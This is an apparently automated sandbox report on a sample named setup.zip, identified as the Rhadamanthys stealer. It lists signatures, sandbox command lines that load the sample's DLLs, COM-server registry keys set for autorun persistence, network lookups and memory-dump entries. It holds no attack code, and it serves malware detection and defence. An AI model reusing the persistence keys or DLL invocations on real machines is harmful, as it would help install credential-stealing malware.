Malware Analysis Report

2024-11-30 02:07

Sample ID 240329-prwbeahd85
Target setup.zip
SHA256 d7587071279ebaca1fe3fc2866c62947fe6c8df9862d1c434a99b4a5fb47a611
Tags
persistence rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d7587071279ebaca1fe3fc2866c62947fe6c8df9862d1c434a99b4a5fb47a611

Threat Level: Known bad

The file setup.zip was found to be: Known bad.

Malicious Activity Summary

persistence rhadamanthys stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Blocklisted process makes network request

Registers COM server for autorun

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Loads dropped DLL

Executes dropped EXE

Unsigned PE

Program crash

Modifies registry class

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of UnmapMainImage

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-29 12:34

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:44

Platform

win11-20240221-en

Max time kernel

439s

Max time network

446s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\authz.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\authz.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:35

Platform

win11-20240221-en

Max time kernel

0s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\ninput.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\ninput.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:34

Platform

win11-20240214-en

Max time kernel

0s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\FXSST.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\FXSST.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:44

Platform

win11-20240221-en

Max time kernel

456s

Max time network

457s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\dcntel.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\dcntel.dll,#1

Network

Country Destination Domain Proto
US 52.111.227.11:443 tcp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:34

Platform

win11-20240221-en

Max time kernel

0s

Max time network

12s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\wevtsvc.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\wevtsvc.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:44

Platform

win11-20240214-en

Max time kernel

453s

Max time network

459s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\authz\clbcatq.dll

Signatures

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\ = "Microsoft COM+ Services Meta Data" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\ = "Microsoft COM+ Services Meta Data" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CLSID\ = "{063B79F5-7539-11D2-9773-00A0C9B4D50C}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\CLSID\ = "{063B79F5-7539-11D2-9773-00A0C9B4D50C}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\ = "Microsoft COM+ Services Meta Data" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CurVer C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\ = "Microsoft COM+ Services Meta Data" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\CLSID\ = "{063B79F6-7539-11D2-9773-00A0C9B4D50C}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\NotInsertable C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CLSID\ = "{063B79F6-7539-11D2-9773-00A0C9B4D50C}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\NotInsertable C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CurVer\ = "ComPlusMetaDataServices.ServicesMetaDataReg.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CurVer C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CurVer\ = "ComPlusMetaDataServices.ServicesMetaDataDispenser.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7} C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\authz\clbcatq.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:35

Platform

win11-20240221-en

Max time kernel

46s

Max time network

13s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\Volume\Professional\license.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\Volume\Professional\license.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp

Files

memory/5104-0-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp

memory/5104-2-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-1-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp

memory/5104-4-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-3-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp

memory/5104-5-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp

memory/5104-6-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-7-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp

memory/5104-8-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-9-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-11-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-10-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-12-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-14-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-13-0x00007FFC47AA0000-0x00007FFC47AB0000-memory.dmp

memory/5104-15-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-18-0x00007FFC88A10000-0x00007FFC88ACD000-memory.dmp

memory/5104-17-0x00007FFC47AA0000-0x00007FFC47AB0000-memory.dmp

memory/5104-16-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-19-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-28-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-29-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

memory/5104-30-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:35

Platform

win11-20240221-en

Max time kernel

31s

Max time network

14s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\_Default\Professional\license.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\_Default\Professional\license.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp

Files

memory/3664-1-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-0-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp

memory/3664-2-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp

memory/3664-3-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-4-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp

memory/3664-5-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp

memory/3664-6-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-7-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp

memory/3664-8-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-9-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-10-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-11-0x00007FFCDA250000-0x00007FFCDA260000-memory.dmp

memory/3664-12-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-13-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-15-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-16-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-14-0x00007FFCDA250000-0x00007FFCDA260000-memory.dmp

memory/3664-17-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-18-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-19-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-20-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-21-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-22-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-23-0x00007FFD1B4A0000-0x00007FFD1B55D000-memory.dmp

memory/3664-24-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-33-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-34-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

memory/3664-35-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:44

Platform

win11-20240221-en

Max time kernel

451s

Max time network

452s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mf.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mf.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:35

Platform

win11-20240214-en

Max time kernel

7s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\mlang.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\mlang.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:44

Platform

win11-20240221-en

Max time kernel

457s

Max time network

459s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\OEM\Professional\license.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\OEM\Professional\license.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

memory/468-0-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-4-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-2-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-1-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-3-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-5-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-6-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-7-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-8-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-10-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-9-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-11-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-12-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-13-0x00007FF9D5B30000-0x00007FF9D5B40000-memory.dmp

memory/468-14-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-15-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-16-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-17-0x00007FF9D5B30000-0x00007FF9D5B40000-memory.dmp

memory/468-18-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-19-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-20-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-21-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-22-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-23-0x00007FFA17A10000-0x00007FFA17ACD000-memory.dmp

memory/468-25-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-33-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-34-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-35-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-58-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-59-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-60-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-61-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp

memory/468-62-0x00007FFA18200000-0x00007FFA18409000-memory.dmp

memory/468-63-0x00007FFA17A10000-0x00007FFA17ACD000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:44

Platform

win11-20240221-en

Max time kernel

436s

Max time network

446s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mspatchc.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mspatchc.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:34

Platform

win11-20240221-en

Max time kernel

2s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\lsasrv.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\lsasrv.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-03-29 12:34

Reported

2024-03-29 12:44

Platform

win11-20240319-en

Max time kernel

442s

Max time network

452s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2360 created 2892 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
